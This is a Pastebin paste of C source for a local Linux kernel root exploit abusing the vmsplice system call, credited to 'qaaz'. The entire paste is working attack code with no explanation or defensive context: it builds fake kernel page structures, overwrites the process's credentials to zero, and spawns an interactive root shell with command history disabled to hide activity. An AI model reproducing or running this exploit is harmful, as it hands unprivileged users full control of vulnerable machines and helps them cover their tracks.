Guest User

Untitled

a guest
Feb 21st, 2018
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.89 KB | None | 0 0
  1. *** proof-of-concept.c
  2. /*
  3. * By qaaz
  4. *
  5. */
  6.  
  7. #define _GNU_SOURCE
  8. #include <stdio.h>
  9. #include <errno.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <malloc.h>
  13. #include <limits.h>
  14. #include <signal.h>
  15. #include <unistd.h>
  16. #include <sys/uio.h>
  17. #include <sys/mman.h>
  18. #include <asm/page.h>
  19. #define __KERNEL__
  20. #include <asm/unistd.h>
  21.  
  22. #define PIPE_BUFFERS 16
  23. #define PG_compound 14
  24. #define uint unsigned int
  25. #define static_inline static inline __attribute__((always_inline))
  26. #define STACK(x) (x + sizeof(x) - 40)
  27.  
  28. struct page {
  29. unsigned long flags;
  30. int count;
  31. int mapcount;
  32. unsigned long private;
  33. void *mapping;
  34. unsigned long index;
  35. struct { long next, prev; } lru;
  36. };
  37.  
  38. void exit_code();
  39. char exit_stack[1024 * 1024];
  40.  
  41. void die(char *msg, int err)
  42. {
  43. printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
  44. fflush(stdout);
  45. fflush(stderr);
  46. exit(1);
  47. }
  48.  
  49. #if defined (__i386__)
  50.  
  51. #ifndef __NR_vmsplice
  52. #define __NR_vmsplice 316
  53. #endif
  54.  
  55. #define USER_CS 0x73
  56. #define USER_SS 0x7b
  57. #define USER_FL 0x246
  58.  
  59. static_inline
  60. void exit_kernel()
  61. {
  62. __asm__ __volatile__ (
  63. "movl %0, 0x10(%%esp) ;"
  64. "movl %1, 0x0c(%%esp) ;"
  65. "movl %2, 0x08(%%esp) ;"
  66. "movl %3, 0x04(%%esp) ;"
  67. "movl %4, 0x00(%%esp) ;"
  68. "iret"
  69. : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  70. "i" (USER_CS), "r" (exit_code)
  71. );
  72. }
  73.  
  74. static_inline
  75. void * get_current()
  76. {
  77. unsigned long curr;
  78. __asm__ __volatile__ (
  79. "movl %%esp, %%eax ;"
  80. "andl %1, %%eax ;"
  81. "movl (%%eax), %0"
  82. : "=r" (curr)
  83. : "i" (~8191)
  84. );
  85. return (void *) curr;
  86. }
  87.  
  88. #elif defined (__x86_64__)
  89.  
  90. #ifndef __NR_vmsplice
  91. #define __NR_vmsplice 278
  92. #endif
  93.  
  94. #define USER_CS 0x23
  95. #define USER_SS 0x2b
  96. #define USER_FL 0x246
  97.  
  98. static_inline
  99. void exit_kernel()
  100. {
  101. __asm__ __volatile__ (
  102. "swapgs ;"
  103. "movq %0, 0x20(%%rsp) ;"
  104. "movq %1, 0x18(%%rsp) ;"
  105. "movq %2, 0x10(%%rsp) ;"
  106. "movq %3, 0x08(%%rsp) ;"
  107. "movq %4, 0x00(%%rsp) ;"
  108. "iretq"
  109. : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  110. "i" (USER_CS), "r" (exit_code)
  111. );
  112. }
  113.  
  114. static_inline
  115. void * get_current()
  116. {
  117. unsigned long curr;
  118. __asm__ __volatile__ (
  119. "movq %%gs:(0), %0"
  120. : "=r" (curr)
  121. );
  122. return (void *) curr;
  123. }
  124.  
  125. #else
  126. #error "unsupported arch"
  127. #endif
  128.  
  129. #if defined (_syscall4)
  130. #define __NR__vmsplice __NR_vmsplice
  131. _syscall4(
  132. long, _vmsplice,
  133. int, fd,
  134. struct iovec *, iov,
  135. unsigned long, nr_segs,
  136. unsigned int, flags)
  137.  
  138. #else
  139. #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
  140. #endif
  141.  
  142. static uint uid, gid;
  143.  
  144. void kernel_code()
  145. {
  146. int i;
  147. uint *p = get_current();
  148.  
  149. for (i = 0; i < 1024-13; i++) {
  150. if (p[0] == uid && p[1] == uid &&
  151. p[2] == uid && p[3] == uid &&
  152. p[4] == gid && p[5] == gid &&
  153. p[6] == gid && p[7] == gid) {
  154. p[0] = p[1] = p[2] = p[3] = 0;
  155. p[4] = p[5] = p[6] = p[7] = 0;
  156. p = (uint *) ((char *)(p + 8) + sizeof(void *));
  157. p[0] = p[1] = p[2] = ~0;
  158. break;
  159. }
  160. p++;
  161. }
  162.  
  163. exit_kernel();
  164. }
  165.  
  166. void exit_code()
  167. {
  168. if (getuid() != 0)
  169. die("wtf", 0);
  170.  
  171. printf("[+] root\n");
  172. putenv("HISTFILE=/dev/null");
  173. execl("/bin/bash", "bash", "-i", NULL);
  174. die("/bin/bash", errno);
  175. }
  176.  
  177. int main(int argc, char *argv[])
  178. {
  179. int pi[2];
  180. size_t map_size;
  181. char * map_addr;
  182. struct iovec iov;
  183. struct page * pages[5];
  184.  
  185. uid = getuid();
  186. gid = getgid();
  187. setresuid(uid, uid, uid);
  188. setresgid(gid, gid, gid);
  189.  
  190. printf("-----------------------------------\n");
  191. printf("Procurve Exploit\n");
  192. printf(" By qaaz\n");
  193. printf("-----------------------------------\n");
  194.  
  195. if (!uid || !gid)
  196. die("!@#$", 0);
  197.  
  198. /*****/
  199. pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
  200. pages[1] = pages[0] + 1;
  201.  
  202. map_size = PAGE_SIZE;
  203. map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
  204. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  205. if (map_addr == MAP_FAILED)
  206. die("mmap", errno);
  207.  
  208. memset(map_addr, 0, map_size);
  209. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  210. printf("[+] page: 0x%lx\n", pages[0]);
  211. printf("[+] page: 0x%lx\n", pages[1]);
  212.  
  213. pages[0]->flags = 1 << PG_compound;
  214. pages[0]->private = (unsigned long) pages[0];
  215. pages[0]->count = 1;
  216. pages[1]->lru.next = (long) kernel_code;
  217.  
  218. /*****/
  219. pages[2] = *(void **) pages[0];
  220. pages[3] = pages[2] + 1;
  221.  
  222. map_size = PAGE_SIZE;
  223. map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
  224. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  225. if (map_addr == MAP_FAILED)
  226. die("mmap", errno);
  227.  
  228. memset(map_addr, 0, map_size);
  229. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  230. printf("[+] page: 0x%lx\n", pages[2]);
  231. printf("[+] page: 0x%lx\n", pages[3]);
  232.  
  233. pages[2]->flags = 1 << PG_compound;
  234. pages[2]->private = (unsigned long) pages[2];
  235. pages[2]->count = 1;
  236. pages[3]->lru.next = (long) kernel_code;
  237.  
  238. /*****/
  239. pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
  240. map_size = PAGE_SIZE;
  241. map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
  242. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  243. if (map_addr == MAP_FAILED)
  244. die("mmap", errno);
  245. memset(map_addr, 0, map_size);
  246. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  247. printf("[+] page: 0x%lx\n", pages[4]);
  248.  
  249. /*****/
  250. map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
  251. map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
  252. MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  253. if (map_addr == MAP_FAILED)
  254. die("mmap", errno);
  255.  
  256. memset(map_addr, 0, map_size);
  257. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  258.  
  259. /*****/
  260. map_size -= 2 * PAGE_SIZE;
  261. if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
  262. die("munmap", errno);
  263.  
  264. /*****/
  265. if (pipe(pi) < 0) die("pipe", errno);
  266. close(pi[0]);
  267.  
  268. iov.iov_base = map_addr;
  269. iov.iov_len = ULONG_MAX;
  270.  
  271. signal(SIGPIPE, exit_code);
  272. _vmsplice(pi[1], &iov, 1, 0);
  273. die("vmsplice", errno);
  274. return 0;
  275. }
Add Comment
Please, Sign In to add comment